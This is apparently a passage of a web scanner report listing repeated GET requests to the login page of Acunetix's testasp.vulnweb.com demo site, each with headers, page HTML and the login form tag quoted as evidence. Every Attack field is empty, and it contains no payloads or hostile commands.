Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> 